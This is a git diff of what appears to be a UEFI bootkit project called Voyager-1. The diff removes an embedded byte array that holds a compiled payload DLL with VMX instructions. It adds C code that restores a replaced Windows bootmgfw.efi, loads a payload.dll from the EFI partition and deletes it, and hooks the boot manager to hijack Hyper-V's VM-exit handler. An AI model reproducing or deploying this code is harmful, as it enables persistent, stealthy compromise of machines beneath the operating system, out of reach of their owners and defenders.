0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x10, 0x48, 0x89, 0x4C, - 0x24, 0x08, 0x48, 0x83, 0xEC, 0x58, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, - 0x8B, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0xB8, 0x02, 0x44, 0x00, 0x00, - 0x0F, 0x78, 0x44, 0x24, 0x28, 0x48, 0x83, 0x7C, 0x24, 0x28, 0x0A, 0x75, - 0x4F, 0x48, 0x8B, 0x44, 0x24, 0x20, 0x48, 0xB9, 0xEF, 0xBE, 0xAD, 0xDE, - 0xEF, 0xBE, 0xAD, 0xDE, 0x48, 0x39, 0x48, 0x08, 0x75, 0x3A, 0x48, 0x8B, - 0x44, 0x24, 0x20, 0x48, 0xC7, 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0xB8, 0x1E, - 0x68, 0x00, 0x00, 0x0F, 0x78, 0x44, 0x24, 0x38, 0xB8, 0x0C, 0x44, 0x00, - 0x00, 0x0F, 0x78, 0x44, 0x24, 0x30, 0x48, 0x8B, 0x44, 0x24, 0x30, 0x48, - 0x8B, 0x4C, 0x24, 0x38, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0xB9, 0x1E, - 0x68, 0x00, 0x00, 0x0F, 0x79, 0xC8, 0xEB, 0x21, 0x48, 0x8D, 0x05, 0x7D, - 0xFF, 0xFF, 0xFF, 0x48, 0x2B, 0x05, 0x76, 0x1F, 0x00, 0x00, 0x48, 0x89, - 0x44, 0x24, 0x40, 0x48, 0x8B, 0x54, 0x24, 0x68, 0x48, 0x8B, 0x4C, 0x24, - 0x60, 0xFF, 0x54, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x58, 0xC3, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x91, 0x77, 0x5F, 0x00, 0x00, 0x00, 0x00, - 0x02, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x91, 0x77, 0x5F, - 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, - 0x94, 0x20, 0x00, 0x00, 0x94, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, - 0x29, 0x18, 0x5B, 0x58, 0xF1, 0x50, 0x02, 0x48, 0x86, 0x42, 0x02, 0x28, - 0xE8, 0x50, 0x11, 0x93, 0x01, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, - 0x73, 0x65, 0x72, 0x73, 0x5C, 0x78, 0x65, 0x72, 0x6F, 0x78, 0x5C, 0x44, - 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x76, 0x6F, 0x79, 0x61, 0x67, - 0x65, 0x72, 0x5C, 0x56, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x2D, 0x31, - 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, 0x65, 0x61, 0x73, 0x65, - 0x5C, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x2E, 0x70, 0x64, 0x62, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0xA2, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x38, 0x00, 0x00, 0x00, - 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0xDC, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7A, - 0x7A, 0x7A, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, 0x14, 0x21, 0x00, 0x00, - 0x0C, 0x00, 0x00, 0x00, 0x2E, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x00, 0x30, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 0x2E, 0x62, 0x73, 0x73, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, - 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, - 0x60, 0x00, 0x00, 0x00, 0x2E, 0x65, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x02, 0x0E, 0x03, 0x00, 0x01, 0x16, 0x00, 0x06, 0x0E, 0xA2, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0xA2, 0x10, 0x00, 0x00, 0x14, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, - 0x00, 0x00, 0x00, 0x00, 0x32, 0x50, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x50, 0x00, 0x00, - 0x2C, 0x50, 0x00, 0x00, 0x30, 0x50, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x3E, 0x50, 0x00, 0x00, 0x00, 0x00, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, - 0x64, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x3F, 0x76, 0x6F, 0x79, 0x61, 0x67, - 0x65, 0x72, 0x5F, 0x63, 0x6F, 0x6E, 0x74, 0x65, 0x78, 0x74, 0x40, 0x40, - 0x33, 0x55, 0x5F, 0x76, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x74, - 0x40, 0x40, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 -}; \ No newline at end of file + EFI_STATUS Result = EFI_SUCCESS; + UINTN HandleCount = NULL; + EFI_HANDLE* Handles = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE PayLoadFileHandle; + EFI_DEVICE_PATH* PayLoadDevicePath = NULL; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + EFI_FILE_PROTOCOL* PayLoadFile = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return Result; + } + + for (UINT32 Idx = 0u; Idx < HandleCount; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return Result; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return Result; + } + + if (!EFI_ERROR((Result = VolumeHandle->Open(VolumeHandle, &PayLoadFileHandle, PAYLOAD_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY)))) + { + VolumeHandle->Close(VolumeHandle); + PayLoadDevicePath = FileDevicePath(Handles[Idx], PAYLOAD_PATH); + + if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&PayLoadDevicePath, &PayLoadFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL)))) + { + Print(L"failed to open payload file... reason -> %r\n", Result); + return Result; + } + + EFI_FILE_INFO* FileInfoPtr = NULL; + UINTN FileInfoSize = NULL; + + if (EFI_ERROR((Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, NULL)))) + { + if (Result == EFI_BUFFER_TOO_SMALL) + { + gBS->AllocatePool(EfiBootServicesData, FileInfoSize, &FileInfoPtr); + if (EFI_ERROR(Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, FileInfoPtr))) + { + Print(L"get backup file information failed... reason -> %r\n", Result); + return Result; + } + } + else + { + Print(L"Failed to get file information... reason -> %r\n", Result); + return Result; + } + } + + VOID* PayLoadBuffer = NULL; + UINTN PayLoadSize = FileInfoPtr->FileSize; + gBS->AllocatePool(EfiBootServicesData, FileInfoPtr->FileSize, &PayLoadBuffer); + + if (EFI_ERROR((Result = PayLoadFile->Read(PayLoadFile, &PayLoadSize, PayLoadBuffer)))) + { + Print(L"Failed to read payload file into buffer... reason -> %r\n", Result); + return Result; + } + + if (EFI_ERROR((Result = PayLoadFile->Delete(PayLoadFile)))) + { + Print(L"unable to delete payload file... reason -> %r\n", Result); + return Result; + } + + *PayLoadBufferPtr = PayLoadBuffer; + gBS->FreePool(FileInfoPtr); + return EFI_SUCCESS; + } + } + + Print(L"unable to find payload on disk...\n"); + return EFI_ABORTED; +} \ No newline at end of file diff --git a/Voyager-1/Voyager-1 (2004-1709)/PayLoad.h b/Voyager-1/Voyager-1 (2004-1709)/PayLoad.h index 1430a93..28ae86f 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/PayLoad.h +++ b/Voyager-1/Voyager-1 (2004-1709)/PayLoad.h @@ -1,17 +1,22 @@ #pragma once #include "Utils.h" -extern unsigned char PayLoad[3072]; +#include +extern VOID* PayLoad; #pragma pack(push, 1) -typedef struct _voyager_t +typedef struct _VOYAGER_T { UINT64 VmExitHandlerRva; UINT64 HypervModuleBase; UINT64 HypervModuleSize; UINT64 ModuleBase; UINT64 ModuleSize; -} voyager_t, * pvoyager_t; +} VOYAGER_T, *PVOYAGER_T; #pragma pack(pop) +#define WINDOWS_BOOTMGFW_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi" +#define PAYLOAD_PATH L"\\efi\\microsoft\\boot\\payload.dll" + UINT32 PayLoadSize(VOID); +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr); VOID* PayLoadEntry(VOID* ModuleBase); \ No newline at end of file diff --git a/Voyager-1/Voyager-1 (2004-1709)/UefiMain.c b/Voyager-1/Voyager-1 (2004-1709)/UefiMain.c index 14db64e..29d9918 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/UefiMain.c +++ b/Voyager-1/Voyager-1 (2004-1709)/UefiMain.c @@ -1,41 +1,62 @@ #include "BootMgfw.h" #include "SplashScreen.h" -CHAR8* gEfiCallerBaseName = "Voyager"; +CHAR8* gEfiCallerBaseName = "Voyager 1"; const UINT32 _gUefiDriverRevision = 0x200; -EFI_STATUS EFIAPI UefiUnload( - IN EFI_HANDLE ImageHandle -) +EFI_STATUS EFIAPI UefiUnload(EFI_HANDLE ImageHandle) { return EFI_SUCCESS; } -EFI_STATUS EFIAPI UefiMain -( - IN EFI_HANDLE ImageHandle, - IN EFI_SYSTEM_TABLE* SystemTable -) +EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE* SystemTable) { EFI_STATUS Result; - EFI_DEVICE_PATH_PROTOCOL* BootMgfwPath; + EFI_HANDLE BootMgfwHandle; gST->ConOut->ClearScreen(gST->ConOut); gST->ConOut->OutputString(gST->ConOut, AsciiArt); Print(L"\n"); + // since we replaced bootmgfw on disk, we are going to need to restore the image back + // this is simply just moving bootmgfw.efi.backup to bootmgfw.efi... if (EFI_ERROR((Result = RestoreBootMgfw()))) { Print(L"unable to restore bootmgfw... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } - if (EFI_ERROR((Result = InstallBootMgfwHooks(ImageHandle)))) + // the payload is sitting on disk... we are going to load it into memory... + if (EFI_ERROR((Result = LoadPayLoadFromDisk(&PayLoad)))) + { + Print(L"failed to read payload from disk... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); + return Result; + } + + EFI_DEVICE_PATH* BootMgfwPath = GetBootMgfwPath(); + if (EFI_ERROR((Result = gBS->LoadImage(TRUE, ImageHandle, BootMgfwPath, NULL, NULL, &BootMgfwHandle)))) + { + Print(L"failed to load bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + + if (EFI_ERROR((Result = InstallBootMgfwHooks(BootMgfwHandle)))) { Print(L"Failed to install bootmgfw hooks... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } + if (EFI_ERROR(gBS->StartImage(BootMgfwHandle, NULL, NULL))) + { + Print(L"Failed to start bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + gBS->Stall(5 * 1000000); return EFI_SUCCESS; } \ No newline at end of file diff --git a/Voyager-1/Voyager-1 (2004-1709)/Utils.h b/Voyager-1/Voyager-1 (2004-1709)/Utils.h index 7b582fe..8b25594 100644 --- 